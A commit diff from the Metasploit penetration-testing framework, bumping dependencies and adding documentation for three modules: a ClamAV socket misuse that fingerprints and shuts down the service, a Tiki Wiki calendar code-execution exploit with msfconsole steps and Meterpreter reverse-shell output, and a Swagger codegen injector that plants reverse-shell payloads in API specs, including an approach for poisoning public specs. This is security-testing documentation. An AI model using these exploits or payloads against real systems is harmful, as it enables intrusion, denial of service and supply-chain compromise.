Merge branch 'master' into egypt/ruby-ntlm

Author: David Maloney

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.12.8)
+    metasploit-framework (4.12.9)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -28,9 +28,14 @@ PATH
       rb-readline-r7
       recog
       redcarpet
+      rex-powershell
+      rex-random_identifier
+      rex-registry
+      rex-text
+      rex-zip
       robots
-      rubyzip
       rubyntlm
+      rubyzip
       sqlite3
       tzinfo
       tzinfo-data
@@ -205,6 +210,15 @@ GEM
     recog (2.0.21)
       nokogiri
     redcarpet (3.3.4)
+    rex-powershell (0.1.0)
+      rex-random_identifier
+      rex-text
+    rex-random_identifier (0.1.0)
+      rex-text
+    rex-registry (0.1.0)
+    rex-text (0.1.1)
+    rex-zip (0.1.0)
+      rex-text
     rkelly-remix (0.0.6)
     robots (0.10.1)
     rspec-core (3.4.4)
@@ -243,7 +257,7 @@ GEM
     timecop (0.8.1)
     tzinfo (1.2.2)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2016.4)
+    tzinfo-data (1.2016.5)
       tzinfo (>= 1.0.0)
     xpath (2.0.0)
       nokogiri (~> 1.3)

documentation/modules/auxiliary/scanner/misc/clamav_control.md

@@ -0,0 +1,91 @@
+ClamAV is an open source antivirus engine for detecting trojans, viruses, malare, and other
+malicious threats.
+
+clamav_control takes advantage of a possible misconfiguration in the ClamAV service on release
+0.99.2 if the service is tied to a socket, and allows you fingerprint the version, and being
+able to shut down the service.
+
+## Vulnerable Application
+
+To install ClamAV from Ubuntu:
+
+```
+$ sudo apt-get install clamav clamav-daemon
+$ sudo freshclam
+```
+
+You might also need to add the following to /etc/clamav/clamd.conf:
+
+```
+# TCP port address.
+# Default: no
+TCPSocket 3310
+
+# TCP address.
+# By default we bind to INADDR_ANY, probably not wise.
+# Enable the following to provide some degree of protection
+# from the outside world.
+# Default: no
+TCPAddr 0.0.0.0
+
+# Maximum length the queue of pending connections may grow to.
+# Default: 15
+MaxConnectionQueueLength 30
+
+# Clamd uses FTP-like protocol to receive data from remote clients.
+# If you are using clamav-milter to balance load between remote clamd daemons
+# on firewall servers you may need to tune the options below.
+
+# Close the connection when the data size limit is exceeded.
+# The value should match your MTA's limit for a maximum attachment size.
+# Default: 10M
+StreamMaxLength 55M
+
+# Limit port range.
+# Default: 1024
+#StreamMinPort 30000
+# Default: 2048
+#StreamMaxPort 32000
+
+# Maximum number of threads running at the same time.
+# Default: 10
+MaxThreads 50
+
+# Waiting for data from a client socket will timeout after this time (seconds).
+# Value of 0 disables the timeout.
+# Default: 120
+ReadTimeout 300
+
+# Waiting for a new job will timeout after this time (seconds).
+# Default: 30
+#IdleTimeout 60
+
+# Maximum depth directories are scanned at.
+# Default: 15
+#MaxDirectoryRecursion 20
+```
+
+And finally, start the service:
+
+```
+$ sudo /etc/init.d/clamav-daemon start
+```
+
+## Options
+
+clamav_control comes with two actions:
+
+**VERSION**
+
+This is the default action, and shows you the ClamAV version. Output example:
+
+```
+msf auxiliary(clamav_control) > run
+
+[+] 192.168.1.203:3310    - ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016
+```
+
+**SHUTDOWN**
+
+This action allows you to shutdown ClamAV. You can also use the VERSION action again to verify
+whether is service is down or not.

documentation/modules/exploit/linux/http/tiki_calendar_exec.md

@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+  * Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
+  * Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
+  * Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+  **Of note, there is some discussion if 14.2 is vuln or not.**
+
+  1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
+  2. The linked app Exploit-DB has is 14.2.
+  3. Its verified on Exploit-DB.
+
+vs
+
+  1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
+  2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
+
+### Creating A Testing Environment
+
+  1. Create a fresh Ubuntu 16.04 w/ a LAMP install
+  2. `apt-get install php-xml`
+  3. Normal php install at that point!
+  4. After install, login as admin:admin
+  5. Go to the Control Panels
+  6. Click Features
+  7. Enable Calendar under Main feature
+  8. Click Apply
+
+#### Permissions
+
+  If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:
+
+  1. Log in as admin
+  2. From the top dropdown select permissions
+  3. Check Anonymous near the top
+  4. Click Assign
+
+## Verification Steps
+
+  1. Install the software as documented above
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/tiki_calendar_exec`
+  4. Do: `set rhost 10.10.10.10`
+  5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
+  6. Do: `set payload php/bind_perl`
+  7. Do: `set verbose true`
+  8. Do: `check`
+
+```
+  [*] Attempting Login
+  [+] Login Successful!
+  [+] 10.10.10.10:80 The target is vulnerable.
+```
+
+  9. Do: `exploit`
+  10. You should get a shell
+
+```
+  [*] Started reverse TCP handler on 10.10.10.10:4444 
+  [*] Attempting Login
+  [+] Login Successful!
+  [*] Sending malicious calendar view packet
+  [*] Sending stage (33721 bytes) 10.10.10.10.190
+  [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
+```
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at first login. Default for admin is 'admin'.
+
+## Scenarios
+
+Example running against unauthenticated calendar v14.1
+
+```
+  msf > use exploit/linux/http/tiki_calendar_exec
+  msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
+  rhost => 192.168.2.190
+  msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
+  targeturi => /t14_1/
+  msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
+  lhost => 192.168.2.229
+  msf exploit(tiki_calendar_exec) > set verbose true
+  verbose => true
+  msf exploit(tiki_calendar_exec) > set username ''
+  username => 
+  msf exploit(tiki_calendar_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.2.229:4444 
+  [*] Sending malicious calendar view packet
+  [*] Sending stage (33721 bytes) to 192.168.2.190
+  [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
+  
+  meterpreter > sysinfo
+  Computer    : tikiwiki
+  OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
+  Meterpreter : php/php
+  meterpreter > 
+```

documentation/modules/exploit/multi/fileformat/swagger_param_inject.md

@@ -0,0 +1,115 @@
+The [Swagger CodeGen parameter injector module](../../../../../modules/exploits/multi/fileformat/swagger_param_inject.rb) generates a Swagger JSON file with embedded Metasploit payloads.
+
+In the typical case, a Swagger document defines an API.  Swagger can be automatically consumed to generate client/server code, testing and scaffolding in APIs by companies eager to provide value to the increasing need for scalable API deployment and testing.
+
+Currently, this module supports 4 languages for delivery: NodeJS, PHP, Ruby, and Java.  These are specified by the PAYLOAD set for the exploit module.
+
+
+## Verification Steps
+
+All exploits assume a bind or reverse-tcp callback handler, with preference on reverse-tcp. 
+
+1. Start msfconsole
+2. Start a callback handler listening for a the appropriate payload (e.g.)
+
+```
+use exploit/multi/handler  
+set PAYLOAD nodejs/shell_reverse_tcp
+
+set LHOST 192.168.68.138 
+set LPORT 4444
+
+run 
+```
+3. Pick a target 
+
+## Targets
+
+**NodeJS** 
+
+This attack injects a payload into javascript by terminating a URL path string.
+
+
+```
+
+use exploit/multi/fileformat/swagger_param_inject
+set PAYLOAD nodejs/shell_reverse_tcp
+set INFO_VERSION "1.0.0"
+set SWAGGER_HOST "localhost"
+run 
+```
+
+**PHP** 
+
+This attack injects a payload into PHP multiline comment area.
+
+
+```
+
+use exploit/multi/fileformat/swagger_param_inject
+set PAYLOAD php/meterpreter/reverse_tcp 
+set SWAGGER_HOST "localhost"
+run 
+```
+
+**ruby** 
+
+This attack injects a payload into ruby multiline comment area.
+
+
+```
+
+use exploit/multi/fileformat/swagger_param_inject
+set PAYLOAD ruby/shell_reverse_tcp 
+set SWAGGER_HOST "localhost"
+run 
+```
+
+**Java** 
+
+This attack injects a payload into Java by terminating a URL path string.
+
+
+```
+
+use exploit/multi/fileformat/swagger_param_inject
+set PAYLOAD java/jsp_shell_reverse_tcp 
+set SWAGGER_HOST "localhost"
+run 
+```
+
+## Quick Test
+
+Use the online [editor.swagger.io](http://editor.swagger.io) to upload your swagger document, and generate pre-built code bases from the document.  The swagger editor leverages [generator.swagger.io](http://generator.swagger.io) to build these clients & servers automatically from the document, and published downloadable artifacts of these code bases.
+
+
+## Scenarios
+
+Effective against services with either these dependencies
+
+*  [swagger-codegen](https://github.com/swagger-api/swagger-codegen)
+  * public API [generator.swagger.io](http://generator.swagger.io/)
+  * public docker container [swagger-generator/](https://hub.docker.com/r/swaggerapi/swagger-generator/)
+* [swagger-test-templates](https://github.com/apigee-127/swagger-test-templates)
+
+**Possible Attack approach.**
+
+1. Research the target environment and component dependencies.  
+2. Setup appropriate payload callback listener.
+3. generate the appropriate swagger document with associated MS payload (see above for examples)
+
+
+**Against a webservice (2nd order attack / blind code-gen)**
+
+*Who knows what insecurely configured code-gen Docker containers hosted in data compute or API broker cluster could do if given the chance...*
+ 
+4. Feed the document to the service in service appropriate submission of Swagger documents.  This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
+5. Wait for callback handler event.  
+
+**Against a code repository or public hosting of spec**
+
+*People and Robots trust swagger to build clients, servers, mocks, and more.  Publicly hosted specs should be verified as to not corrupt automatic code generation.*
+
+4. Feed the document to the service in service appropriate submission of Swagger documents.  This is most often accoplished by defining a Mock, Test or Pass-Thru service automatically constructed by the swagger document definition.
+5. Wait for callback handler event.  
+

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.12.8"
+      VERSION = "4.12.9"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/base/simple/buffer.rb

@@ -48,7 +48,7 @@ def self.transform(buf, fmt = "ruby", var_name = 'buf')
       when 'java'
         buf = Rex::Text.to_java(buf, var_name)
       when 'powershell', 'ps1'
-        buf = Rex::Text.to_powershell(buf, var_name)
+        buf = Rex::Powershell.to_powershell(buf, var_name)
       when 'vbscript'
         buf = Rex::Text.to_vbscript(buf, var_name)
       when 'vbapplication'